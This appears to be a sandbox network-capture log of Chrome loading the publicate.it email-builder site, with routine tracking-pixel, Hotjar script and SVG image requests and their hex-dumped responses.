                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1484OUTGET /?sid=bElvO73dOjE4ZMqj&data=eyJnYVRyYWNraW5nSWRzIjpbIlVBLTUyNTk3MDkwLTEiXSwiZ2FNZWFzdXJlbWVudElkcyI6W10sImdhQ2xpZW50SWRzIjpbIjEzODE2ODA2MDYuMTcyNTAzNDU3OSJdLCJjb250ZXh0Ijp7ImxpYnJhcnkiOnsibmFtZSI6ImxmdHJhY2tlciIsInZlcnNpb24iOiIyLjY0LjAifSwicGFnZVVybCI6Imh0dHBzOi8vcHVibGljYXRlLml0Lz91dG1fc291cmNlPXB1YmxpY2F0ZV91c2VyX2V4cG9ydGVkX2VtYWlscyZ1dG1fbWVkaXVtPXJlZmVycmFsJnV0bV9jYW1wYWlnbj1wb3dlcmVkX2J5X3B1YmxpY2F0ZSIsInBhZ2VUaXRsZSI6IlB1YmxpY2F0ZSB8IEhUTUwgRW1haWwgVGVtcGxhdGUgQnVpbGRlciIsInJlZmVycmVyIjoiIn0sImV2ZW50IjoidHJhY2tpbmctZXZlbnQiLCJjbGllbnRFdmVudElkIjoiNjhjYmY1NTkyMTJlYjkyNyIsInNjcmlwdElkIjoiYkVsdk83M2RPakU0Wk1xaiIsImNvb2tpZXNFbmFibGVkIjp0cnVlLCJjb25zZW50TGV2ZWwiOiJub25lIiwiYW5vbnltaXplSXAiOmZhbHNlLCJsZkNsaWVudElkIjoiTEYxLjEuZWQxZTM0NDk3OGE2NTFjNy4xNzI1MDM0NTc5Njk4IiwiZm9yZWlnbkNvb2tpZXMiOltdLCJwcm9wZXJ0aWVzIjp7fSwiYXV0b1RyYWNraW5nRW5hYmxlZCI6dHJ1ZSwiYXV0b1RyYWNraW5nTW9kZSI6Im9uX3NjcmlwdF9sb2FkIn0= HTTP/1.1
                                                                                                                                                                                                        Host: tr-rc.lfeeder.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC414INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/gif
                                                                                                                                                                                                        Content-Length: 43
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: CloudFront
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:22 GMT
                                                                                                                                                                                                        X-Cache: LambdaGeneratedResponse from cloudfront
                                                                                                                                                                                                        Via: 1.1 7d758b616f5473c7b4bee1c49ecfa98a.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: PsFniKP5ZOhvfbomIj0L4WhpZuNZehNmOTzuhQmpO58y0PFY9CbLOw==
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        72192.168.2.54983718.239.94.1214436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC537OUTGET /c/hotjar-2431713.js?sv=7 HTTP/1.1
                                                                                                                                                                                                        Host: static.hotjar.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC632INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:22 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Cache-Control: max-age=60
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        ETag: W/b30f074cd7f59b1b60b0526838dae4cf
                                                                                                                                                                                                        Strict-Transport-Security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                        X-Cache-Hit: 1
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                        Via: 1.1 1559f99ec21d6c3066e5715e5c06aa76.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                        X-Amz-Cf-Id: 3MeWsh5ehwuyn0L69_4_VU8nVDeesSh9VtqyIlCrROsKQs_7FcOFbw==
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC11153INData Raw: 32 62 38 39 0d 0a 77 69 6e 64 6f 77 2e 68 6a 53 69 74 65 53 65 74 74 69 6e 67 73 20 3d 20 77 69 6e 64 6f 77 2e 68 6a 53 69 74 65 53 65 74 74 69 6e 67 73 20 7c 7c 20 7b 22 73 69 74 65 5f 69 64 22 3a 32 34 33 31 37 31 33 2c 22 72 22 3a 30 2e 34 36 36 33 37 31 36 31 37 38 39 30 32 31 31 36 2c 22 72 65 63 5f 76 61 6c 75 65 22 3a 30 2e 32 30 35 2c 22 73 74 61 74 65 5f 63 68 61 6e 67 65 5f 6c 69 73 74 65 6e 5f 6d 6f 64 65 22 3a 22 61 75 74 6f 6d 61 74 69 63 22 2c 22 72 65 63 6f 72 64 22 3a 74 72 75 65 2c 22 63 6f 6e 74 69 6e 75 6f 75 73 5f 63 61 70 74 75 72 65 5f 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 72 65 63 6f 72 64 69 6e 67 5f 63 61 70 74 75 72 65 5f 6b 65 79 73 74 72 6f 6b 65 73 22 3a 74 72 75 65 2c 22 73 65 73 73 69 6f 6e 5f 63 61 70 74 75 72 65 5f
                                                                                                                                                                                                        Data Ascii: 2b89window.hjSiteSettings = window.hjSiteSettings || {"site_id":2431713,"r":0.4663716178902116,"rec_value":0.205,"state_change_listen_mode":"automatic","record":true,"continuous_capture_enabled":true,"recording_capture_keystrokes":true,"session_capture_
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        73192.168.2.549847104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC927OUTGET /images/mailchimp_client.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC753INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:22 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 43157
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "a895-620aa1d13659f"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DfaVkclorMcclDMlXtJuoamPHrje0jA5DBtbRJs9FKIseSlvp%2FAXKU2lxn6iYMaQOdm%2Bp0Evl%2FaAYYvBuXozE2MMbKrLBlerNgzEqERTnWP3QlFzivMPiTsw%2BKiTTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615ba2f2e5e72-EWR
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC616INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 33 36 70 78 22 20 68 65 69 67 68 74 3d 22 31 33 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 33 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 33 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 30 2e 33 32 35 2c 30 20 4c 31 30 37 2e 36 37 35
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>3</title> <defs> <path d="M10.325,0 L107.675
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 73 3d 22 30 2e 35 22 20 6f 70 65 72 61 74 6f 72 3d 22 64 69 6c 61 74 65 22 20 69 6e 3d 22 53 6f 75 72 63 65 41 6c 70 68 61 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4f 66 66 73 65 74 20 64 78 3d 22 30 22 20 64 79 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4f 66 66 73 65 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22
                                                                                                                                                                                                        Data Ascii: s="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology> <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset> <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1"
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 67 41 41 41 41 49 41 43 41 59 41 41 41 44 30 65 4e 54 36 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 45 52 6c 57 45 6c 6d 54 55 30 41 4b 67 41 41 41 41 67 41 41 59 64 70 41 41 51 41 41 41 41 42 41 41 41 41 47 67 41 41 41 41 41 41 41 36 41 42 41 41 4d 41 41 41 41 42 41 41 45 41 41 4b 41 43 41 41 51 41 41 41 41 42 41 41 41 43 41 4b 41 44 41 41 51 41 41 41 41 42 41 41 41 43 41 41 41 41 41 41 41 4c 2b 4c 57 46 41 41 42 41 41 45 6c 45 51 56 52 34 41 65 78 39 42 62 68 64 78 66 55 39 46 6f 49 48 43 47 34 4a 67 65 41 75 78 55 6d 4b 74 37 67 56 43 67 57 4b 51 34 45 69 78 64 73 66 70 4a 51 57 57 6f 6f 58 64 36 65 55 6f 67 57 4b 42 79 76 75 72 67 6e 75 54 6e 44 34 2f 39 63 69 37 38 4c 6c
                                                                                                                                                                                                        Data Ascii: w0KGgoAAAANSUhEUgAAAgAAAAIACAYAAAD0eNT6AAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAACAKADAAQAAAABAAACAAAAAAAL+LWFAABAAElEQVR4Aex9BbhdxfU9FoIHCG4JgeAuxUmKt7gVCgWKQ4EixdsfpJQWWooXd6eUogWKByvurgnuTnD4/9ci78Ll
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 45 39 43 72 43 78 4a 58 67 32 77 51 69 41 62 32 56 35 68 45 50 49 69 77 4f 4c 41 54 38 42 6c 67 64 38 2f 64 51 76 66 77 35 35 52 59 43 2f 4c 46 68 48 34 54 7a 38 6f 67 42 48 6f 59 69 6c 67 47 6d 42 6c 49 54 6c 38 53 37 67 63 75 43 66 41 4b 63 50 4a 47 4a 41 44 49 67 42 72 77 79 77 6b 37 73 52 38 42 4c 41 74 35 53 59 38 41 62 73 2f 52 65 77 42 38 41 48 52 56 2f 41 6c 58 44 65 2b 47 44 67 43 38 41 48 52 34 38 6a 48 58 5a 43 36 69 44 73 63 4b 34 45 63 4b 33 4a 2f 77 42 66 48 50 76 49 78 79 78 70 63 44 53 4b 49 77 50 62 41 2f 30 41 69 52 67 51 41 32 4c 41 4f 51 4d 4c 49 41 56 75 51 38 76 53 53 49 55 51 68 72 38 72 77 49 5a 79 66 32 41 52 6f 49 6f 52 75 76 6d 51 4c 6b 63 59 66 50 44 42 30 59 73 5a 67 64 53 45 55 79 38 63 56 57 45 2b 63 69 6a 38 4d 38 41 48 6e
                                                                                                                                                                                                        Data Ascii: E9CrCxJXg2wQiAb2V5hEPIiwOLAT8Blgd8/dQvfw55RYC/LFhH4Tz8ogBHoYilgGmBlITl8S7gcuCfAKcPJGJADIgBrwywk7sR8BLAt5SY8Abs/RewB8AHRV/AlXDe+GDgC8AHR48jHXZC6iDscK4EcK3J/wBfHPvIxyxpcDSKIwPbA/0AiRgQA2LAOQMLIAVuQ8vSSIUQhr8rwIZyf2ARoIoRuvmQLkcYfPDB0YsZgdSEUy8cVWE+cij8M8AHn
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 50 79 2b 48 64 4b 68 76 5a 6c 35 48 2b 5a 67 44 66 4a 43 58 46 47 56 67 58 55 62 38 47 58 4f 63 6c 4f 78 72 6e 41 46 57 58 47 39 64 2b 53 6e 2f 6e 73 76 51 6f 79 73 44 34 67 45 51 4d 69 49 48 49 47 4f 41 76 34 5a 30 4e 56 4e 6e 49 38 53 33 69 41 47 41 69 51 47 4c 44 77 4e 5a 51 45 38 49 30 54 70 58 6c 53 6d 6e 37 71 39 66 44 62 49 71 74 74 49 67 42 4d 65 43 4c 41 51 37 64 56 54 31 73 65 7a 6c 73 47 4f 6a 4c 34 5a 71 6c 73 77 2f 38 31 55 4e 51 48 50 67 6f 41 39 79 6c 4d 33 2f 4e 36 70 66 63 46 51 50 52 4d 73 43 68 64 72 35 35 2b 32 67 63 57 71 58 42 34 66 34 4e 6f 32 55 76 48 73 50 2f 56 6d 45 65 74 38 70 33 58 61 75 75 7a 72 6e 6d 6e 69 63 36 53 73 53 41 47 41 69 59 41 65 37 4c 35 69 70 2f 31 34 31 42 4f 2f 33 63 31 73 66 30 4a 77 45 6b 37 68 6b 59 47 30
                                                                                                                                                                                                        Data Ascii: Py+HdKhvZl5H+ZgDfJCXFGVgXUb8GXOclOxrnAFWXG9d+Sn/nsvQoysD4gEQMiIHIGOAv4Z0NVNnI8S3iAGAiQGLDwNZQE8I0TpXlSmn7q9fDbIqttIgBMeCLAQ7dVT1sezlsGOjL4Zqlsw/81UNQHPgoA9ylM3/N6pfcFQPRMsChdr55+2gcWqXB4f4No2UvHsP/VmEet8p3Xauuzrnmnic6SsSAGAiYAe7L5ip/141BO/3c1sf0JwEk7hkYG0
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 50 4b 52 4d 49 67 62 45 51 45 59 47 65 4c 72 65 79 59 43 76 78 75 5a 56 70 4d 55 48 6a 53 51 63 42 6e 6a 57 77 6e 46 41 46 54 2f 71 35 4b 76 63 4b 52 31 2f 64 62 78 4b 72 74 38 4a 70 31 72 4a 45 6a 45 51 4e 67 50 63 30 2f 30 76 77 46 65 46 76 52 31 70 54 52 38 32 4a 62 57 7a 6a 6d 73 2b 58 67 52 38 6c 51 47 6c 49 36 35 64 6c 6f 48 58 61 31 65 44 35 62 41 59 4b 4d 44 41 35 49 68 7a 43 2b 43 79 4d 6a 62 72 35 6a 59 79 6e 68 6b 76 43 59 4f 42 66 6a 43 44 65 61 4b 74 66 66 37 71 51 48 4e 39 30 48 63 33 76 44 38 66 52 76 57 53 46 57 49 67 58 41 5a 6d 67 47 6d 50 41 44 34 61 6f 63 2b 52 7a 71 38 42 53 54 67 4d 72 41 46 54 58 67 46 38 35 4c 2f 53 45 4d 38 2b 79 34 42 2b 45 43 69 63 64 6b 61 57 42 4d 6a 41 62 4c 42 70 42 4f 43 6a 55 76 49 73 41 66 32 51 54 7a 69
                                                                                                                                                                                                        Data Ascii: PKRMIgbEQEYGeLreyYCvxuZVpMUHjSQcBnjWwnFAFT/q5KvcKR1/dbxKrt8Jp1rJEjEQNgPc0/0vwFeFvR1pTR82JbWzjms+XgR8lQGlI65dloHXa1eD5bAYKMDA5IhzC+CyMjbr5jYynhkvCYOBfjCDeaKtff7qQHN90Hc3vD8fRvWSFWIgXAZmgGmPAD4aoc+Rzq8BSTgMrAFTXgF85L/SEM8+y4B+ECicdkaWBMjAbLBpBOCjUvIsAf2QTzi
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 4f 62 44 46 2b 35 66 64 70 6d 33 30 69 31 2b 55 79 34 44 50 42 56 54 49 67 61 53 5a 47 41 70 65 4f 56 36 57 50 6a 76 53 54 49 58 76 6c 4f 62 77 38 52 50 67 4a 51 62 5a 2f 6d 6d 2f 48 56 5a 42 6c 68 2f 4a 67 32 2f 71 73 74 43 4d 5a 43 66 67 55 55 52 78 66 55 32 4d 50 36 6f 6a 38 51 76 41 32 79 77 7a 67 64 63 4e 6f 7a 53 4c 58 37 72 55 41 62 4f 39 6c 74 31 6c 5a 6f 59 38 4d 50 41 76 45 6a 6d 62 63 42 6c 4a 54 37 49 6a 79 74 4b 70 59 6d 42 75 66 48 39 53 63 42 6c 76 6b 71 33 2b 4b 31 4c 47 56 69 68 71 57 37 70 61 30 59 47 4e 4e 65 62 6b 61 69 4b 67 67 31 45 75 6e 63 41 4d 7a 68 4d 2f 30 44 6f 56 67 66 41 49 63 45 74 56 47 2b 41 61 36 63 44 47 72 4a 73 51 59 37 78 4a 53 36 59 48 51 47 38 43 4c 77 4a 73 44 50 4e 54 33 62 41 66 67 31 49 34 6d 66 67 47 62 6a 41
                                                                                                                                                                                                        Data Ascii: ObDF+5fdpm30i1+Uy4DPBVTIgaSZGApeOV6WPjvSTIXvlObw8RPgJQbZ/mm/HVZBlh/Jg2/qstCMZCfgUURxfU2MP6oj8QvA2ywzgdcNozSLX7rUAbO9lt1lZoY8MPAvEjmbcBlJT7IjytKpYmBufH9ScBlvkq3+K1LGVihqW7pa0YGNNebkaiKgg1EuncAMzhM/0DoVgfAIcEtVG+Aa6cDGrJsQY7xJS6YHQG8CLwJsDPNT3bAfg1I4mfgGbjA
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 72 39 6f 6d 51 6c 4c 71 4e 33 68 37 6e 63 4d 75 63 71 48 79 33 31 76 67 4d 37 4e 79 78 41 37 7a 49 5a 2f 65 4f 51 4c 4e 2f 4b 5a 69 79 51 52 69 68 52 75 4e 43 52 2f 6e 49 72 34 76 48 41 72 51 43 50 6d 4c 58 4d 42 2b 6b 71 7a 2b 66 65 79 42 4f 4a 47 49 69 57 67 58 31 67 75 61 75 47 34 41 6e 6f 5a 6b 4d 6d 63 63 63 41 33 78 54 35 6c 75 73 71 44 36 33 31 58 67 39 62 69 7a 36 59 7a 2b 7a 69 4a 34 66 36 75 61 4b 66 30 79 43 70 43 6b 63 4b 31 67 45 4f 42 2b 34 45 4f 4d 70 68 6e 55 66 53 6c 34 33 54 35 38 48 39 42 49 42 45 44 45 54 4a 41 50 63 6a 66 77 75 34 71 50 41 76 51 65 39 4d 55 62 49 53 6a 39 45 63 4d 72 34 50 63 4a 46 2f 31 6a 71 35 33 57 34 50 6f 4f 67 55 48 34 66 4b 52 33 58 77 39 54 72 63 57 78 69 6f 6d 37 41 44 79 50 55 46 76 77 65 34 77 50 45 7a 77
                                                                                                                                                                                                        Data Ascii: r9omQlLqN3h7ncMucqHy31vgM7NyxA7zIZ/eOQLN/KZiyQRihRuNCR/nIr4vHArQCPmLXMB+kqz+feyBOJGIiWgX1guauG4AnoZkMmcccA3xT5lusqD631Xg9biz6Yz+ziJ4f6uaKf0yCpCkcK1gEOB+4EOMphnUfSl43T58H9BIBEDETJAPcjfwu4qPAvQe9MUbISj9EcMr4PcJF/1jq53W4PoOgUH4fKR3Xw9TrcWxiom7ADyPUFvwe4wPEzw
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 2f 58 4d 64 39 41 76 62 4e 47 69 6a 46 6e 48 74 66 41 74 67 4c 75 42 53 6f 30 35 75 39 69 33 78 6e 5a 34 6b 50 77 4e 4d 42 56 77 65 48 75 62 44 62 53 69 66 58 58 72 41 44 4b 52 45 44 55 54 47 77 4e 71 78 31 39 53 44 5a 4f 53 6f 6d 34 6a 45 32 68 6a 65 73 47 30 41 6e 70 35 56 43 45 69 35 59 32 77 36 34 43 48 67 58 73 47 72 38 70 55 64 63 62 6f 48 79 4a 42 45 44 55 54 45 77 4e 36 78 6c 7a 39 56 46 41 33 5a 30 56 45 7a 45 59 53 77 58 76 52 37 70 4b 4c 38 73 79 38 41 70 73 44 47 45 6f 56 43 75 75 76 38 46 63 44 49 77 41 72 44 30 55 62 72 45 5a 36 4d 4d 58 49 69 79 4a 52 45 44 55 54 48 41 4c 55 69 75 46 76 31 64 43 39 33 6a 52 63 56 47 2b 4d 5a 79 79 4a 6f 50 31 6b 61 6a 45 2b 49 6e 31 79 50 73 58 53 47 56 58 4d 75 79 44 48 41 6f 63 42 38 51 2b 76 71 49 45 50
                                                                                                                                                                                                        Data Ascii: /XMd9AvbNGijFnHtfAtgLuBSo05u9i3xnZ4kPwNMBVweHubDbSifXXrADKREDUTGwNqx19SDZOSom4jE2hjesG0Anp5VCEi5Y2w64CHgXsGr8pUdcboHyJBEDUTEwN6xlz9VFA3Z0VEzEYSwXvR7pKL8sy8ApsDGEoVCuuv8FcDIwArD0UbrEZ6MMXIiyJREDUTHALUiuFv1dC93jRcVG+MZyyJoP1kajE+In1yPsXSGVXMuyDHAocB8Q+vqIEP
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 37 45 76 44 4a 33 32 47 57 39 35 43 79 68 75 32 6e 52 73 42 45 6a 45 51 48 51 4e 63 72 50 49 61 59 46 32 68 4f 4f 38 2f 45 4a 43 55 5a 32 42 2b 71 48 67 66 73 4d 34 6a 4b 33 30 48 5a 6e 52 78 54 59 52 37 4e 6d 41 2f 72 50 69 51 6e 6e 44 4c 71 6e 58 65 63 49 70 7a 2b 34 7a 6c 58 38 48 45 51 48 41 4d 75 44 68 42 54 76 50 2b 64 74 6b 38 4b 31 53 35 36 4b 42 5a 4e 59 52 2f 79 2b 44 71 6b 67 6a 6a 36 76 63 6b 72 50 79 51 6e 76 6f 38 74 43 33 7a 65 70 38 4d 35 56 39 42 78 45 43 51 44 48 44 56 74 57 56 6c 61 4f 6a 4b 38 6c 41 49 6b 70 44 41 6a 4f 49 35 39 39 78 53 31 4f 41 31 74 4d 39 44 75 2f 41 31 46 2b 35 66 46 72 44 39 6f 66 45 70 65 38 49 74 36 36 33 79 35 70 59 75 35 56 2b 33 78 55 43 77 44 41 79 47 5a 52 38 44 72 51 70 32 6d 57 74 33 51 4b 66 6d 2f 63 74
                                                                                                                                                                                                        Data Ascii: 7EvDJ32GW95Cyhu2nRsBEjEQHQNcrPIaYF2hOO8/EJCUZ2B+qHgfsM4jK30HZnRxTYR7NmA/rPiQnnDLqnXecIpz+4zlX8HEQHAMuDhBTvP+dtk8K1S56KBZNYR/y+Dqkgjj6vckrPyQnvo8tC3zep8M5V9BxECQDHDVtWVlaOjK8lAIkpDAjOI599xS1OA1tM9Du/A1F+5fFrD9ofEpe8It663y5pYu5V+3xUCwDAyGZR8DrQp2mWt3QKfm/ct


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        74192.168.2.549846104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC923OUTGET /images/yahoo_client.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
